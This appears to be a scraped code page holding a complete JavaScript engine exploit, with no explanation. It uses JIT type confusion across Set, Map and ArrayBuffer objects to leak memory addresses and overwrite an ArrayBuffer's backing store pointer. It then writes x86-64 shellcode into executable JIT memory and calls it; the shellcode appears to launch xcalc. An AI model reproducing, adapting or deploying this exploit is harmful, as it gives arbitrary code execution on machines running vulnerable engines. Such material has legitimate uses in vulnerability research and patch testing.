1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 87 88 89 90 91 92 93 94 95 96 97 98 99 100 101 102 103 104 105 106 107 108 109 110 111 112 113 114 115
|
class Memory{ constructor(){ this.buf = new ArrayBuffer(8); this.f64 = new Float64Array(this.buf); this.u32 = new Uint32Array(this.buf); this.bytes = new Uint8Array(this.buf); } d2u(val){ this.f64[0] = val; let tmp = Array.from(this.u32); return tmp[1] * 0x100000000 + tmp[0]; } u2d(val){ let tmp = []; tmp[0] = parseInt(val % 0x100000000); tmp[1] = parseInt((val - tmp[0]) / 0x100000000); this.u32.set(tmp); return this.f64[0]; } } var mem = new Memory();
function leak_string(str) { return str.charCodeAt(0)*0x1+str.charCodeAt(1)*0x100+str.charCodeAt(2)*0x10000+str.charCodeAt(3)*0x1000000+str.charCodeAt(4)*0x100000000+str.charCodeAt(5)*0x10000000000+str.charCodeAt(6)*0x1000000000000+str.charCodeAt(7)*0x100000000000000; }
function Ctor1(){ n = new Set(); }
function Ctor2(){ m = new Map(); }
function Ctor3(){ l = new ArrayBuffer(); }
function Check1(obj){ n.xyz0 = 3.4766863919152113e-308; n.xyz1 = 0; n.xyz2 = 0x1000; n.xyz3 = obj; }
function Check2(val){ m.xyz0 = 3.4766863919152113e-308; m.xyz1 = 0; m.xyz2 = 0x1000; m.xyz3 = val; }
function Check3(val){ l.xyz0 = 3.4766863919152113e-308; l.xyz1 = val; }
function func() { return 0; } for(var i = 0; i < 10000; i++){ func(); }
for(var i = 0; i < 10000; i++){ Ctor1(); Ctor2(); Ctor3(); }
for(var i = 0; i < 10000; i++){ Check1(null); Check2(3.4766863919152113e-308); Check3(3.4766863919152113e-308); }
var ab = new ArrayBuffer(0x100); var str= new String(null);
Ctor1(); Ctor2(); Ctor3();
Check1(ab); ab_addr = leak_string(str); ab_backing = ab_addr + 0x20; print("[*]backing store: 0x" + ab_backing.toString(16));
Check1(func); func_addr = leak_string(str)-1; code_entry = func_addr + 0x38; print("[*]func address: 0x" + func_addr.toString(16));
Check1(String(null)); Check2(mem.u2d(ab_backing - 0x8)); Check3(mem.u2d(code_entry));
dataView = new DataView(ab); rwx_area = mem.d2u(dataView.getFloat64(0, true)); print("[*]rwx_area: 0x" + rwx_area.toString(16));
Check3(mem.u2d(rwx_area)); var shellcode=[0x90909090,0x90909090,0x782fb848,0x636c6163,0x48500000,0x73752fb8,0x69622f72,0x8948506e,0xc03148e7,0x89485750,0xd23148e6,0x3ac0c748,0x50000030,0x4944b848,0x414c5053,0x48503d59,0x3148e289,0x485250c0,0xc748e289,0x00003bc0,0x050f00];
for (i = 0; i < shellcode.length; i++){ dataView.setUint32(i * 4, shellcode[i], true); }
func();
|
评论